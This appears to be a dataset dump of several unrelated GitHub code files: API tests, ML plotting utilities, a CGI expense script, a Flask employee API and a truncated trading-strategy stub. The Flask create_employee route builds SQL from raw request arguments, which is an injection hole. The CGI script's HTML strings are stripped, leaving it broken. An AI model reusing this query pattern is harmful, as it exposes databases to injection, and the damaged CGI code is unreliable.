test_get_artifact_bad_request(api, client):\n resp = client.get('/artifact')\n assert resp.status_code == 400\n\n\ndef test_get_bad_artifact(api, client, artifacts):\n resp = client.get(f'/artifact/31a122e8-9ba8-4f60-a9fb-490c66fd4b0a')\n assert resp.status_code == 404\n\n\ndef test_get_artifacts_by_task_id(api, client, artifact):\n task_id = artifact[0]['task']['task_id']\n\n resp = client.get(api.url_for(ArtMan, task_id=task_id))\n assert len(resp.json) == 1\n assert resp.json[0]['task']['task_id'] == task_id\n\n\ndef test_get_artifacts_by_bad_task_id(api, client, artifact):\n task_id = '31a122e8-9ba8-4f60-a9fb-490c66fd4b0a'\n\n resp = client.get(api.url_for(ArtMan, task_id=task_id))\n assert resp.status_code == 404\n\n\ndef test_get_artifact_by_bad_sri(api, client, artifact):\n bad_sri = 'c2hhMjU2LXZGYXRjZXlXYUU5QWtzM045b3VSVXRiYTFtd3JJSGRFVkx0aTg4YXRJdmM9'\n resp = client.get(f'/artifact/sri/{bad_sri}')\n assert resp.status_code == 404\n\n\ndef test_get_artifacts_by_sri(api, client, artifacts):\n resp = client.get(f'/artifact/sri/{artifacts[0][1][\"sri-urlsafe\"]}')\n assert resp.status_code == 200\n assert len(resp.json) == 2\n\n\ndef test_head_artifact_bad_request(api, client):\n resp = client.head('/artifact')\n assert resp.status_code == 400\n\n\ndef test_head_artifact(api, client, artifacts):\n\n for artifact in artifacts:\n art_id = artifact[0].json['artifact_id']\n resp = client.head(f'/artifact/{art_id}')\n assert resp.status_code == 200\n assert resp.headers['x-gman-artifact-status'] == 'unknown'\n\n\ndef test_head_bad_artifact(api, client, artifacts):\n\n resp = client.head(f'/artifact/31a122e8-9ba8-4f60-a9fb-490c66fd4b0a')\n assert resp.status_code == 404\n\n\ndef test_head_artifacts_by_sri(api, client, artifacts):\n resp = client.head(f'/artifact/sri/{artifacts[0][1][\"sri-urlsafe\"]}')\n assert resp.status_code == 200\n assert int(resp.headers['x-gman-artifacts']) == 2\n\n\ndef test_head_artifacts_for_task_id(api, client, artifact):\n task_id = artifact[0]['task']['task_id']\n\n resp = client.head(api.url_for(ArtMan, task_id=task_id))\n assert int(resp.headers['x-gman-artifacts']) == 1\n\n\ndef test_put_artifact(api, client):\n\n resp = client.put(api.url_for(ArtMan))\n\n assert resp.status_code == 405\n\n\ndef test_post_artifact_no_task(api, client):\n art = {'task_id': '7d394a53-6f45-4847-bfd1-105eef07dd08'}\n\n art.update(_artifacts[0])\n resp = client.post(api.url_for(ArtMan), json=art)\n\n assert resp.status_code == 404, 'Code failed to check that the task exists'\n assert 'errors' in resp.json, 'Missing expected errors response'\n assert 'task_id' in resp.json['errors'], (\n 'Did not throw the correct error for this test')\n\n\ndef test_post_bad_artifact_url(api, client):\n\n resp = client.post('/artifact/31a122e8-9ba8-4f60-a9fb-490c66fd4b0a')\n assert resp.status_code == 400\n\n\ndef test_post_same_artifact_twice(api, client, artifact):\n\n art = {'task_id': artifact[0]['task']['task_id']}\n art.update(_artifacts[0])\n\n resp = client.post(api.url_for(ArtMan), json=art)\n\n assert resp.status_code == 409\n\n\n@pytest.mark.parametrize('dissallowed', ('artifact_id', 'timestamp',\n 'status', 'event_id'))\ndef test_post_dissallowed_field(api, client, dissallowed):\n\n art = _artifacts[0].copy()\n art[dissallowed] = 'Some value'\n resp = client.post(api.url_for(ArtMan), json=art)\n assert resp.status_code == 422\n\n\ndef test_post_field_value_errors(api, client):\n\n art = _artifacts[0].copy()\n art['type'] = 'asdfasdfs'\n art['task_id'] = 1234\n resp = client.post(api.url_for(ArtMan), json=art)\n assert resp.status_code == 422\n\n\ndef test_raw_artifact_bad_hash(testtask):\n task_resp = testtask()\n task = Task().get(Task.task_id == task_resp.json['task']['task_id'])\n\n event = TaskEvent.create(task=task,\n message='testing creating an artifact',\n status='info',\n timestamp=datetime.datetime.now())\n with pytest.raises(ValueError):\n Artifact().create(\n task=task,\n event_id=event,\n type='log',\n status='unknown',\n sri='some non sri value',\n uri='https://www.example.com'\n )\n\n\ndef test_failed_artifact_create_no_table(api, client, monkeypatch, testtask):\n task = testtask()\n\n db.drop_tables([Artifact])\n\n art = {'task_id': task.json['task']['task_id']}\n art.update(_artifacts[0])\n\n resp = client.post(api.url_for(ArtMan), json=art)\n assert resp.status_code == 500\n\n\ndef test_failed_artifact_create_IDK(api, client, monkeypatch, testtask):\n task = testtask()\n\n def myfunc(*args, **kwargs):\n kwargs['uri'] = {'not a valid thing'}\n return None\n\n monkeypatch.setattr('piperci_gman.orm.models.Artifact.create', myfunc)\n\n art = {'task_id': task.json['task']['task_id']}\n art.update(_artifacts[0])\n\n resp = client.post(api.url_for(ArtMan), json=art)\n assert resp.status_code == 500\n", "repo_name": "dreamteamrepos/piperci-gman", "sub_path": "tests/test_artifact.py", "file_name": "test_artifact.py", "file_ext": "py", "file_size_in_byte": 7407, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "piperci_gman.artman.ArtMan", "line_number": 46, "usage_type": "argument"}, {"api_name": "pytest.fixture", "line_number": 41, "usage_type": "attribute"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 65, "usage_type": "argument"}, {"api_name": "pytest.fail", "line_number": 68, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 50, "usage_type": "attribute"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 96, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 104, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 149, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 155, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 164, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 183, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 194, "usage_type": "argument"}, {"api_name": "pytest.mark.parametrize", "line_number": 188, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 188, "usage_type": "attribute"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 203, "usage_type": "argument"}, {"api_name": "piperci_gman.orm.models.Task", "line_number": 209, "usage_type": "call"}, {"api_name": "piperci_gman.orm.models.Task.task_id", "line_number": 209, "usage_type": "attribute"}, {"api_name": "piperci_gman.orm.models.TaskEvent.create", "line_number": 211, "usage_type": "call"}, {"api_name": "piperci_gman.orm.models.TaskEvent", "line_number": 211, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 214, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 214, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 215, "usage_type": "call"}, {"api_name": "piperci_gman.orm.models.Artifact", "line_number": 216, "usage_type": "call"}, {"api_name": "piperci_gman.orm.models.db.drop_tables", "line_number": 229, "usage_type": "call"}, {"api_name": "piperci_gman.orm.models.db", "line_number": 229, "usage_type": "name"}, {"api_name": "piperci_gman.orm.models.Artifact", "line_number": 229, "usage_type": "name"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 234, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 250, "usage_type": "argument"}]} +{"seq_id": "35986754025", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport umap\nfrom collections import defaultdict\nfrom sklearn.manifold import TSNE\nfrom sklearn.metrics import plot_confusion_matrix\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.inspection import permutation_importance\n\n\nCOLOR_DICT = {\n 0: \"blue\",\n 1: \"orange\",\n 2: \"green\",\n 3: \"red\",\n 4: \"purple\",\n 5: \"brown\",\n 6: \"olive\",\n 7: \"gray\",\n 8: \"pink\",\n 9: \"cyan\",\n 10: \"violet\",\n 11: \"magenta\",\n}\n\n\ndef train_visualize_random_forest(\n feature_matrix: np.array,\n labels: list,\n rf_estimators: int,\n rf_random_state: int = 42,\n) -> tuple:\n \"\"\" Trains and visualizes a random forest classifier.\n\n Notes:\n This isn't intended to be particularly flexible and and is more for demo purposes.\n\n Args:\n feature_matrix: (num_features x num_characters) matrix.\n labels: Ground-truth labels for the data set.\n rf_estimators: How many estimators should be used for the RF model?\n rf_random_state: Random state seed for reproducibility.\n\n Returns:\n A dictionary of character names and labels; also returns permutation_importances.\n \"\"\"\n\n # Create the train/test split.\n X_train, X_test, y_train, y_test = train_test_split(\n feature_matrix, labels, random_state=rf_random_state\n )\n\n # Extract the character names from the test set to look at individual results later.\n char_names = X_test[:, 0]\n\n # Delete the character names column before feeding into model.\n X_train = np.delete(X_train, obj=0, axis=1)\n X_test = np.delete(X_test, obj=0, axis=1)\n\n # Train the random forest model.\n rfc = RandomForestClassifier(\n n_estimators=rf_estimators, random_state=rf_random_state\n ).fit(X_train, y_train)\n\n # Build the return dictionary\n labels_by_character = {}\n predicted_labels = rfc.predict(X_test)\n for idx, char in enumerate(char_names):\n ground_truth = y_test[idx]\n predicted = predicted_labels[idx]\n labels_by_character[char] = {\n \"true_label\": ground_truth,\n \"predicted_label\": predicted,\n }\n\n # Do the actual plotting\n fig, ax = plt.subplots(figsize=(20, 20))\n plot_confusion_matrix(rfc, X_test, y_test, normalize=None, ax=ax)\n plt.show()\n\n # Get feature importances\n permutation_importances = permutation_importance(rfc, X_test, y_test, random_state=rf_random_state, n_jobs=2)\n sorted_idx = permutation_importances.importances_mean.argsort()\n\n # Finally, return the dictionary of labels.\n return labels_by_character, permutation_importances, sorted_idx\n\n\ndef visualize_clustering_results(cluster_points: list, labels: list) -> None:\n \"\"\" Visualizes and labels the clusters resulting from an analysis.\n\n Args:\n cluster_points: [(x1, y1), (x2, y2), ..., (xN, yN)]\n labels: Label for each of the points in cluster_points.\n \n \"\"\"\n\n # First, split out the point tuples by label.\n points_by_label = defaultdict(list)\n for idx, point in enumerate(cluster_points):\n points_by_label[labels[idx]].append(point)\n\n # Next, stack the points for each label into a single array.\n big_xy_list_by_label = {}\n for label, points_for_that_label in points_by_label.items():\n big_xy_list_by_label[label] = np.stack(tuple(points_for_that_label))\n\n # Compute the centroids of each point cloud for labeling.\n centroids_by_label = {}\n for label, arr in big_xy_list_by_label.items():\n length = arr.shape[0]\n sum_x = np.sum(arr[:, 0])\n sum_y = np.sum(arr[:, 1])\n centroid = sum_x / length, sum_y / length\n centroids_by_label[label] = centroid\n\n # Initialize a counter to iterate through the color map\n i = 0\n plt.rcParams.update({\"font.size\": 22, \"font.weight\": \"bold\"})\n fig, ax = plt.subplots(figsize=(20, 20))\n for label, coords in centroids_by_label.items():\n ax.scatter(\n big_xy_list_by_label[label][:, 0],\n big_xy_list_by_label[label][:, 1],\n c=COLOR_DICT[i],\n s=50,\n alpha=0.5,\n label=label,\n )\n # plt.scatter(coords[0], coords[1], c=color_dict[i], label=label, s=100, alpha=0)\n ax.annotate(label, xy=coords, textcoords=\"data\", color=\"black\")\n i += 1\n ax.legend(loc=\"best\")\n plt.show()\n\n\ndef tsne_points(feature_matrix: np.array, perplexity: int) -> list:\n \"\"\" Applies a t-SNE analysis and returns the character positions grouped by class.\n\n Notes:\n This isn't the cleanest, but I want parity with the way I analyze the UMAP data, so I\n chose the format to enable that. Because this is for plotting, I don't bother with more\n than 2 t-SNE dimensions (it's hard-coded), and I use 1000 iterations, which seems to offer\n well-converged results based on my testing. I use Manhattan distance for two reasons:\n\n 1. The data is riddled with outliers in the feature space.\n 2. The attribute features range from 0 - 20(ish) while the one-hot vectors are binary,\n and using Euclidean distance would weight the attributes too heavily.\n\n Args:\n feature_matrix: (num_features x num_characters) matrix.\n labels: Ground-truth labels for the data set.\n perplexity: Perplexity for the t-SNE model. N^(1/2) is a reasonable guess.\n\n Returns:\n A list of (x, y) tuples corresponding to the coordinates of each character in the embedding\n space.\n \n \"\"\"\n number_of_t_sne_components = 2\n number_of_t_sne_iterations = 1000\n t_sne_metric = \"manhattan\"\n\n tsne = TSNE(\n n_components=number_of_t_sne_components,\n perplexity=perplexity,\n n_iter=number_of_t_sne_iterations,\n metric=t_sne_metric,\n )\n results = tsne.fit_transform(feature_matrix)\n\n # This is where my hacky plotting script makes us do unseemly things.\n tsne_1 = results[:, 0]\n tsne_2 = results[:, 1]\n plottable_list_form = []\n for idx in range(len(tsne_1)):\n plottable_list_form.append((tsne_1[idx], tsne_2[idx]))\n\n return plottable_list_form\n\n\ndef umap_points(\n feature_matrix: np.array, umap_neighors: int = 200, min_dist: float = 0.1\n) -> list:\n \"\"\" As with the t-SNE method above, but with UMAP instead. \n \n Notes:\n The choice of n_neighbors is currently defaulted to 200, because that's roughly the\n number of members of each class. min_dist was based on some empirical tuning.\n \n \"\"\"\n mapper = umap.UMAP(n_neighbors=umap_neighors, min_dist=min_dist, metric=\"manhattan\")\n u = mapper.fit_transform(feature_matrix)\n return list(u)\n", "repo_name": "dchannah/dndmlpy", "sub_path": "dndmlpy/analysis_utils.py", "file_name": "analysis_utils.py", "file_ext": "py", "file_size_in_byte": 6750, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 59, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "sklearn.metrics.plot_confusion_matrix", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "sklearn.inspection.permutation_importance", "line_number": 83, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams.update", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 120, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 138, "usage_type": "attribute"}, {"api_name": "sklearn.manifold.TSNE", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 184, "usage_type": "attribute"}, {"api_name": "umap.UMAP", "line_number": 193, "usage_type": "call"}]} +{"seq_id": "36373414632", "text": "#!C:\\Python27\\python\nimport cgi\nimport cgitb; cgitb.enable()\nfrom controlador_gastos import * #conexion y funciones con la tabla gastos\nfrom controlador_categorias import * #conexion y funciones con la tabla categorias\n\nprint(\"Content-Type: text/html\\n\")\n\n#Parametros de la busqueda\nform = cgi.FieldStorage() \nsesion = form.getfirst('Sesion','empty')\nuser_id = form.getfirst('user_id','empty')\nfecha_inicial = form.getfirst('fecha_inicial','empty')\nfecha_final = form.getfirst('fecha_final','empty')\n\n#Encabezado generico\nprint(\"\"\"\n\t\n\t\n\tCGI script! Python\n\t\n\t\n\"\"\"\n)\n\n#Tabla de resultados\nprint (\"\"\"\n\t
\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\"\"\"\n)\n\n#Objeto controlador de la tabla gastos\ntabla_gastos = ControladorGastos()\n\n#Objeto controlador de la tabla categorias\ntabla_categorias = ControladorCategorias()\n\n#Cargamos la lista de categorias de gastos\ncategorias_disponibles = tabla_categorias.verCategorias()\nnombres_categorias = []\nkeys_categorias = []\nfor cursor_categorias in categorias_disponibles:\n\tcursor = cursor_categorias.fetchall()\n\tfor fila_categoria in cursor:\n\t\tkeys_categorias.append(fila_categoria[0])\n\t\tnombres_categorias.append(fila_categoria[1])\n\n#Buscamos los gastos del usuario\ndatos = tabla_gastos.verGastos(user_id,fecha_inicial,fecha_final)\n\ntotal = 0 #total de los gastos mostrados\nfila = 0 #fila de la tabla\n#Se imprime la tabla de resultados\nfor result in datos:\n\tresultado= result.fetchall()\n\tfor registro in resultado:\n\t\tprint('')\n\t\tprint('')\n\t\ttotal = total + float(registro[1]) #calculamos el total\n\t\t#Selector de categorias\n\t\tprint('')\n\t\tprint('')\n\t\t#Boton para borrar registro\n\t\tprint('')\n\t\t#Formulario para modificar registro\n\t\tprint('')\n\t\tprint('')\t\t\n\t\tfila = fila + 1\n\t\t\n#imprimimos\tel total de los gastos mostrados\t\nprint('\t')\n\t\t\nprint (\"\"\"\n\t
MontoCategoriaFechaDescripcion
')\n\t\tprint('')\n\t\tprint('')\n\t\tprint('')\n\t\tprint('')\n\t\tprint('
')\n\t\tprint('')\n\t\tprint('')\n\t\tprint('')\n\t\tprint('')\t\t\n\t\tprint('')\t\t\n\t\tprint('')\t\t\n\t\tprint('')\n\t\tprint('')\t\t\n\t\tprint('
Total: '+str(total)+'
\n\"\"\"\n)\n\n#Lee los campos de su formulario para la modificacion de registros\nprint (\"\"\"\n\n\"\"\"\n)\t", "repo_name": "stormvolt/SGPF", "sub_path": "sitio_web/tabla_gastos.py", "file_name": "tabla_gastos.py", "file_ext": "py", "file_size_in_byte": 4402, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cgitb.enable", "line_number": 3, "usage_type": "call"}, {"api_name": "cgi.FieldStorage", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "42800583313", "text": "from .utils import str_or_none\n\n\nclass SourceField:\n\n def __init__(\n self, source, source_field_name, field_description,\n is_title, is_facet, field_type, index_field):\n\n self.source = str_or_none(source)\n self.source_field_name = str_or_none(source_field_name)\n self.field_description = str_or_none(field_description)\n self.is_title = True if is_title != '' else False\n self.is_facet = True if is_facet != '' else False\n self.field_type = str_or_none(field_type)\n self.index_field = str_or_none(index_field)\n\n def __str__(self):\n\n fields = []\n for key in self.__dict__:\n fields.append(f'{key}={self.__dict__[key]}')\n\n return self.__class__.__name__ + '(' + ', '.join(fields) + ')'\n\n def __repr__(self):\n\n return self.__str__()\n\n\nclass IndexField:\n\n def __init__(self, index_field, field_type, is_facet):\n\n self.index_field = index_field\n\n if field_type.endswith('[]'):\n self.field_type = field_type.rstrip('[]')\n self.is_array = True\n else:\n self.field_type = field_type\n self.is_array = False\n\n self.is_facet = is_facet\n self.source_fields = []\n\n self._added = set()\n\n def add_source_field(self, source_field):\n\n self._ensure_right_type(source_field)\n self._ensure_not_duplicate(source_field)\n self._ensure_facet(source_field)\n\n self.source_fields.append(source_field)\n\n def _ensure_right_type(self, source_field):\n\n index_type = self.field_type\n if self.is_array:\n index_type += '[]'\n\n assert source_field.field_type == index_type, \\\n f'Index field type mismatch. {source_field} must be of type {self.field_type}'\n\n def _ensure_not_duplicate(self, source_field):\n\n key = source_field.source + source_field.source_field_name\n assert key not in self._added, f'Diplicate key: {key}'\n self._added.add(key)\n\n def _ensure_facet(self, source_field):\n '''Все поля источника данного поля индекса должны иметь одинаковое значение is_facet.\n Если есть различия, то надо создать несколько полей индекса\n '''\n assert source_field.is_facet == self.is_facet, \\\n f'IS_FACET mismatch: {source_field} has is_facet different from {self.is_facet}'\n\n def __str__(self):\n\n fields = []\n for key in self.__dict__:\n fields.append(f'{key}={self.__dict__[key]}')\n\n return self.__class__.__name__ + '(' + ', '.join(fields) + ')'\n\n def __repr__(self):\n\n return self.__str__()\n", "repo_name": "Sapunov/aisconfgen", "sub_path": "aisconfgen/fields.py", "file_name": "fields.py", "file_ext": "py", "file_size_in_byte": 2758, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.str_or_none", "line_number": 10, "usage_type": "call"}, {"api_name": "utils.str_or_none", "line_number": 11, "usage_type": "call"}, {"api_name": "utils.str_or_none", "line_number": 12, "usage_type": "call"}, {"api_name": "utils.str_or_none", "line_number": 15, "usage_type": "call"}, {"api_name": "utils.str_or_none", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "30037749195", "text": "from datetime import datetime\nfrom flask import Flask, request\nfrom flask_restful import Resource, Api\nfrom sqlalchemy import create_engine\nfrom flask_jsonpify import jsonify\nfrom flask_cors import CORS\n\ndb_connect = create_engine('sqlite:///database/enterprise.db')\napp = Flask(__name__)\napi = Api(app)\ncor_app = CORS(app)\n\n\nclass Employee (Resource):\n\n @app.route('/employees', methods=['GET'])\n def get_all_employees():\n conn = db_connect.connect() # connect to database\n query = conn.execute(\"select * from employees\") # This line performs query and returns json result\n return {'employees': [i[0] for i in query.cursor.fetchall()]} # Fetches first column that is Employee ID\n\n @app.route('/employees/', methods=['GET'])\n def get_employee(employee_id):\n try:\n eid = int(employee_id)\n except Exception as e:\n return {\"error\": \"Invalid employee ID: {}\".format(e)}\n conn = db_connect.connect()\n query = conn.execute(\"select * from employees where EmployeeId =%d \" % eid)\n result = {'data': [dict(zip(tuple(query.keys()), i)) for i in query.cursor]}\n return jsonify(result)\n\n @app.route('/employees/create', methods=['POST'])\n def create_employee():\n column_names = {\n \"first_name\": \"FirstName\",\n \"last_name\": \"LastName\",\n \"address\": \"Address\",\n \"birth_date\": \"BirthDate\",\n \"city\": \"City\",\n \"country\": \"Country\",\n \"email\": \"Email\",\n \"fax\": \"Fax\",\n \"hire_date\": \"HireDate\",\n \"phone\": \"Phone\",\n \"postal_code\": \"PostalCode\",\n \"reports_to\": \"ReportsTo\",\n \"state\": \"State\",\n \"title\": \"Title\"\n }\n first_name = request.args.get('first_name')\n last_name = request.args.get('last_name')\n if first_name is None or last_name is None:\n return {\"error\": \"Field names are required\"}\n if len(first_name) == 0 or len(last_name) == 0:\n return {\"error\": \"Field names are empty\"}\n columns = \",\".join(column_names.get(column) for column in request.args)\n values = \"'{}', '{}'\".format(first_name, last_name)\n try:\n for column in request.args:\n if column != \"first_name\" and column != \"last_name\":\n value = request.args[column]\n if column == \"hire_date\" or column == \"birth_date\":\n values = values + \",'{}'\".format(datetime.strptime(value, \"%Y-%m-%d\"))\n elif column == \"reports_to\":\n values = values + \",{}\".format(int(value))\n else:\n values = values + \",'{}'\".format(value)\n except Exception as e:\n return {\"error\": \"Verify your parameters: {}\".format(e)}\n conn = db_connect.connect()\n print(columns, values)\n query = conn.execute(\"INSERT INTO employees (\" + columns + \") VALUES ( \" + values + \" )\")\n return {\"success\": \"Employee created, number of rows {}\".format(query.rowcount)}\n\n @app.route('/employees/delete', methods=['POST'])\n def delete_employee():\n employee_id = request.args.get('employee_id')\n if employee_id is None:\n return {\"error\": \"Employee ID not defined\"}\n try:\n employee_id = int(employee_id)\n except Exception as e:\n return {\"error\": \"Invalid employee ID: {}\".format(e)}\n conn = db_connect.connect()\n query = \"DELETE FROM employees where EmployeeId =%d \" % employee_id\n query = conn.execute(query)\n if query.rowcount == 0:\n return {\"skipped\": \"No employee was deleted\"}\n return {\"success\": \"Number of rows deleted {}\".format(query.rowcount)}\n\n @app.route('/employees/delete/last', methods=['POST'])\n def delete_last_employee():\n conn = db_connect.connect()\n query = conn.execute(\"DELETE FROM employees where EmployeeId = (SELECT MAX(EmployeeId) FROM employees)\")\n if query.rowcount == 0:\n return {\"skipped\": \"No employee was deleted\"}\n return {\"success\": \"Number of rows deleted {}\".format(query.rowcount)}\n\n\napi.add_resource(Employee) # Route_1\n\nif __name__ == '__main__':\n app.run(port='5002')\n", "repo_name": "amanajas/flask", "sub_path": "rest.py", "file_name": "rest.py", "file_ext": "py", "file_size_in_byte": 4333, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "flask_restful.Api", "line_number": 10, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 11, "usage_type": "call"}, {"api_name": "flask_restful.Resource", "line_number": 14, "usage_type": "name"}, {"api_name": "flask_jsonpify.jsonify", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 51, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 52, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 57, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 60, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 60, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 62, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 62, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 64, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 64, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 78, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 78, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 78, "usage_type": "name"}]} +{"seq_id": "16242697518", "text": "import threading\nimport time\nfrom utils.gendern import gender_detector\nfrom utils.age import age_detector\nfrom utils.emotion import emotion_detector\n\nclass prediction:\n def __init__(self, gen_det, age_det, emo_det):\n self.age_detector = age_detector()\n self.gender_detector = gender_detector()\n self.emotion_detector = emotion_detector()\n self.images = []\n self.results = []\n self.gen_det=gen_det\n self.age_det=age_det\n self.emo_det=emo_det\n\n def start_threads(self):\n x = threading.Thread(target=self.predict, args=([]), daemon=True)\n x.start()\n\n def pass_detections(self, dets):\n self.images = dets\n\n def predict(self):\n while True:\n try:\n newdets = []\n for img in self.images:\n age = \"\"\n gender = \"\"\n emotion = \"\"\n # Predict gender\n if(self.gen_det):\n gender = self.gender_detector.detect_gender(img[1])\n # Predict age\n if(self.age_det):\n age = self.age_detector.detect_age(img[1])\n # Predict emotion\n if (self.emo_det):\n emotion = self.emotion_detector.detect_emotion(img[1])\n # Append results to newdets\n newdets.append([img[0], img[1], gender, age, emotion])\n self.results = newdets\n except Exception as e:\n print(str(e))\n time.sleep(1/10)", "repo_name": "kretmatt/InnovationLab3", "sub_path": "utils/prediction.py", "file_name": "prediction.py", "file_ext": "py", "file_size_in_byte": 1612, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.age.age_detector", "line_number": 9, "usage_type": "call"}, {"api_name": "utils.gendern.gender_detector", "line_number": 10, "usage_type": "call"}, {"api_name": "utils.emotion.emotion_detector", "line_number": 11, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 19, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "5157315117", "text": "\nimport numpy as np\nimport matplotlib\nimport pandas as pd\nimport datetime\nimport os.path\nimport sys\nimport math\nimport backtrader as bt\n\nfrom backtrader_plotting import Bokeh\nfrom backtrader_plotting.schemes import Tradimo\nmatplotlib.use('QT5Agg')\n\n\nfrom enum import Enum\nclass OrderDirection(Enum):\n NOTHING = 1\n BUY = 2\n SELL = 3\n\ndef StrategyN(n):\n return globals()['Strategy'+str(n)]\n\n\n\ndef Strategy1(df, profit_ratio=2.5):\n pexec = df.tail(1)['close'].values[0]\n direction = OrderDirection.NOTHING\n pslimit = psloss = np.nan\n #insert your strategy here\n return direction, pexec, pslimit, psloss\ndef Strategy2(df, profit_ratio=2.5):\n pexec = df.tail(1)['close'].values[0]\n direction = OrderDirection.NOTHING\n pslimit = psloss = np.nan\n #insert your strategy here\n return direction, pexec, pslimit, psloss\ndef Strategy3(df, profit_ratio=2.5):\n pexec = df.tail(1)['close'].values[0]\n direction = OrderDirection.NOTHING\n pslimit = psloss = np.nan\n #insert your strategy here\n return direction, pexec, pslimit, psloss\n\n\n\n \n# Create a Stratey\nclass TestStrategy(bt.Strategy):\n params = (\n ('Strategy_idx', 1),\n ('backtest_days', 6),\n ('len_df', 10), \n )\n\n \n def log(self, txt, dt=None):\n ''' Logging function fot this strategy'''\n dt = dt or self.datas[0].datetime[0]\n dt = bt.num2date(dt)\n print('%s(%d), %s' % (dt.isoformat(), self.nextcount, txt), file=self.f)\n\n def __init__(self):\n print('Strategy_idx'+str(self.p.Strategy_idx))\n self.outputpath = 'output.txt'\n self.f = open(self.outputpath, 'w') \n # self.profit_ratio = 2.5\n self.singleposloss = 5.0\n self.nextcount = 0\n self.dataclose = self.datas[0].close\n # self.lastcounttrade = 4000\n \n # To keep track of pending orders\n self.order = list()\n self.order_executed_price = None\n self.order_takeprofit_price = None\n self.order_stoploss_price = None\n self.order_size = None\n self.sma = bt.indicators.SimpleMovingAverage(period=self.p.len_df-24*self.p.backtest_days)#dummy for prepare data\n \n \n def notify_order(self, order):\n if order.status in [order.Submitted, order.Accepted]:\n # Buy/Sell order submitted/accepted to/by broker - Nothing to do\n return\n\n # Check if an order has been completed\n # Attention: broker could reject order if not enough cash\n if order.status in [order.Completed]:\n if order.isbuy():\n self.log('BUY EXECUTED, 